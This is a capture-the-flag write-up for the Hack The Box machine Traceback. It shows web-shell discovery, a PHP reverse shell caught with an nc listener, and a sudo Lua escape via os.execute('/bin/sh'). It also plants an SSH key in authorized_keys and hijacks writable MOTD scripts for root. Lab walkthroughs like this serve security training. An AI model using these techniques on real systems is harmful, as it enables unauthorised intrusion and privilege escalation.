CTF – HTB – Traceback

Hello everyone and welcome back to yet another HTB writeup.

Our initial nmap scan reveals only an ssh and webserver open.

root@kali:~/Desktop/htb/Traceback# nmap -sC -sV 10.10.10.181 -p 1-65535 -o TCP_full_scan                                                                 [1/1]
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-12 20:46 EDT
Nmap scan report for 10.10.10.181
Host is up (0.036s latency). 
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION                                                                                                                                  
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                                 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) 
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)  
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us                                                          
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
                                                                                                                                                              
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.48 seconds

On the website we find an interesting comment in the source :

<body>
    <center>
        <h1>This site has been owned</h1>
        <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
        <h3> - Xh4H - </h3>
        <!--Some of the best web shells that you might need ;)-->
    </center>
</body>

Dirbusting for files and folders with seclists then fuzzing to find virtual hosts gives no result.

root@kali:~/Desktop/htb/Traceback# wfuzz -H "Host: FUZZ.traceback.htb" -u "http://traceback.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 151
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://traceback.htb/
Total requests: 4997

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                                      
===================================================================

000000690:   400        12 L     53 W     422 Ch      "gc._msdcs"                                                                                  

Total time: 48.01821
Processed Requests: 4997
Filtered Requests: 4996
Requests/sec.: 104.0646

We consider the hint previously given and build a list of webshells that we are going to bruteforce on the box, revealing /smevk.php.

root@kali:~/Desktop/htb/Traceback# cat wordlist 
1n73ction.php            
52.php         
OsComPayLoad.php
c99.php
cgi      
cgipro1.php
cgiproffesional.php
indoxploit
k2
marion001
pak.php
r57.php
shell4sym.php
smtp.php
up.txt
upluad.php
wso
alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

We stumble upon a login page and directly get in with admin:admin, and we have full webshell. We proceed to upload a php reverse shell and obtain a shell as webadmin.

root@kali:~/Desktop/htb/Traceback# nc -lvp 9999
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.10.181.
Ncat: Connection from 10.10.10.181:56150.
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 21:21:43 up  1:26,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
/bin/sh: 0: can't access tty; job control turned off

We quickly find a way to pivot as sysadmin, as well as an interesting note.

$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
$ cd /home/webadmin
$ ls -la
total 48
drwxr-x--- 5 webadmin sysadmin 4096 Apr 15 20:18 .
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ..
-rw------- 1 webadmin webadmin  449 Apr 15 20:51 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Apr 15 20:16 .ssh
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16 03:53 note.txt
$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
$

Since we can run a lua script with sysadmin privileges, we proceed to create a lua file and run it as sysadmin.

$ echo -n "os.execute('/bin/sh')" > privesc.lua
$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode
id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)

We then proceed to add our ssh public key to the sysadmin authorized_keys to obtain a full interactive shell; in our attacker machine :

root@kali:~/Desktop/htb/Traceback# ssh-keygen -t rsa -b 4096
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): key
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in key.
Your public key has been saved in key.pub.
The key fingerprint is:
SHA256:mXCRn4D967VXQglQu7bEyfVgdJ8PRGHmaoEJQBA8q7E root@kali
The key's randomart image is:
+---[RSA 4096]----+
|   .o+o+o..o..B..|
|    o . +o o.B .o|
|     o. .+o.o.*o.|
|  . .  o o+o Bo+.|
|   +    S  .X.  o|
|  E       .+... .|
|         . ... o |
|          . . .  |
|             .   |
+----[SHA256]-----+
root@kali:~/Desktop/htb/Traceback#

In our victim machine :

pwd
/home/sysadmin
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCpdSnm22bs8CSg8fHuOWhyDn56TAR+BV9DUZaKUyWT2DtPEzfuKgXcGd65IXZLl/fN0e7El0uVr9QiwIqkzTWOGQfFY0gO9OSTGpLEh4jP4caG24H0sPUY5cp6SCwveGWSxnBBa2I2IBjEzHE0ML0pVWA5U3Qw7N8gT24CskklfFm8oaZ2ZVCDpDRZ9Ow+NjDkVRMJLfPIRqsYVaKaiGMNeCBIIoN3OqTWqapx89S2oAbwfKOz9zEMq+Gzx9ibJDy+FYGPGiblZ5eKfdiI4jPrfQFpsex2D7VcLjtOme7FeFzo+22QuUIEuHo1Qg2siVwWkLDJCN+b7mUA1nm/k2/qOetiYuGCnj5mNv9BEht4sADGI4XRSwrHTHIQYiz7dZuw5bKmdxUVapsV/WiShCpIKbsFeaQenploOlgsK7qjknHYwkUUY7/4Y10cM5+1zlV4Vubl/dRAEHeufeXcEuXapKw6kFLDawRIhzFI8Mui3R2RfnyorPHWvyrT4Futztpg9JnWrr6+U73475C8mXZZaZSTizWrySgcRPFL6sW+JfTkn6xmSL7ss3KOBCdc0Z7as5WB5xizl1yf9TxFYuNu8BNcG9YOfJUI1OJHW0mwz8PgB6RLqtXeS5ZR5PXVwONhFX39nkz7OrCEgpsG0J9jST03M820k/YorWNeOeAw5Q== root@kali" >> ./.ssh/authorized_keys

We login as sysadmin with ssh and proceed to enumerate the machine, we quickly find this process running :

root@kali:~/Desktop/htb/Traceback# ssh -i key sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2
$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$ ps aux

[...snip...]

root       3979  0.0  0.0  58792  3180 ?        S    21:32   0:00 /usr/sbin/CRON -f
root       3982  0.0  0.0   4628   860 ?        Ss   21:32   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
root       3984  0.0  0.0   7468   772 ?        S    21:32   0:00 sleep 30

[..snip...]

Theres a program copying the root MOTD files to another folder. According to ubuntu man pages :

UNIX/Linux system adminstrators often communicate important information to console and
remote users by maintaining text in the file /etc/motd, which is displayed by the
pam_motd(8) module on interactive shell logins.

Luckily, /etc/update-motd.d/ is writeable by sysadmin. However we have a 30 seconds window before our files are squashed by the /var/backups/.update-motd.d/ files.

sysadmin@traceback:/etc/update-motd.d$ ls -la
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Apr 15 21:50 00-header
-rwxrwxr-x  1 root sysadmin  982 Apr 15 21:50 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Apr 15 21:50 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Apr 15 21:50 80-esm
-rwxrwxr-x  1 root sysadmin  299 Apr 15 21:50 91-release-upgrade
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#

[..snip...]

[ -r /etc/lsb-release ] && . /etc/lsb-release

We simply add a command in the 00-header file to call our php-reverse-shell.php and have less than 30 seconds to login as ssh to obtain our command executed and get root user on our listener!

And again, thanks for reading!